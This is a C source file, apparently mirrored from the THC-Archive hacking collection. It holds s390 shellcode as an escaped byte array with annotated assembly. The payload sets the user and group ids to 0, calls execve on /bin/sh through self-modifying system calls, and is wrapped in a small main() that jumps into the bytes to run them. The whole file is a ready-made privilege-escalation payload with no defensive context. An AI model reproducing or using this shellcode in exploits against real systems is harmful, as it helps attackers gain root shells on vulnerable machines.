RISCI_ATOM
/
THC-Archive
mirror of https://github.com/vanhauser-thc/THC-Archive.git


			
				
					
						
						
							123456789101112131415161718192021222324252627282930313233343536373839
							/* setuid/setgid 0 execve s390 shellcode   			*/
/* code by jcyberpunk@thehackerschoice.com 			*/

char shellcode[]=
"\x0c\x10"             	/* bassm	%r1,%r0			*/
"\x41\x90\x10\x48"     	/* la		%r9,72(%r1)		*/
"\xa7\xa8\xfb\xb4"     	/* lhi		%r10,-1100		*/
"\xa7\x68\x04\x56"     	/* lhi		%r6,1110		*/
"\x1a\x6a"             	/* ar 		%r6,%r10		*/
"\x42\x60\x10\x48"     	/* stc		%r6,72(%r1)		*/
"\x17\x22"             	/* xr		%r2,%r2			*/
"\x0d\xe9"             	/* basr		%r14,%r9		*/
"\xa7\x68\x04\x7a"     	/* lhi		%r6,1146		*/
"\x1a\x6a"             	/* ar		%r6,%r10		*/
"\x42\x60\x10\x49"     	/* stc		%r6,73(%r1)		*/
"\x0d\xe9"             	/* basr		%r14,%r9		*/
"\xa7\x68\x04\x57"     	/* lhi		%r6,1111		*/
"\x1a\x6a"             	/* ar		%r6,%r10		*/
"\x42\x60\x10\x49"     	/* stc		%r6,73(%r1)		*/
"\x41\x20\x10\x4c"     	/* la		%r2,76(%r1)		*/
"\x50\x20\x10\x54"     	/* st		%r2,84(%r1)		*/
"\x41\x30\x10\x54"     	/* la		%r3,84(%r1)		*/
"\x17\x44"             	/* xr		%r4,%r4			*/
"\x42\x40\x10\x53"     	/* stc		%r4,83(%r1)		*/
"\x50\x40\x10\x58"     	/* st		%r4,88(%r1)		*/
"\x41\x40\x10\x58"     	/* la		%r4,88(%r1)		*/
"\x0d\xe9"             	/* basr		%r14,%r9		*/
"\x0b\x17"             	/* svc n after self-modification	*/
"\x07\xfe"             	/* br		%r14			*/
"\x2f\x62"             	/* /b					*/
"\x69\x6e\x2f\x73"     	/* in/s					*/
"\x68\x5c";		/* h\					*/

main()
{
 void (*z)()=(void*)shellcode;
 z();
}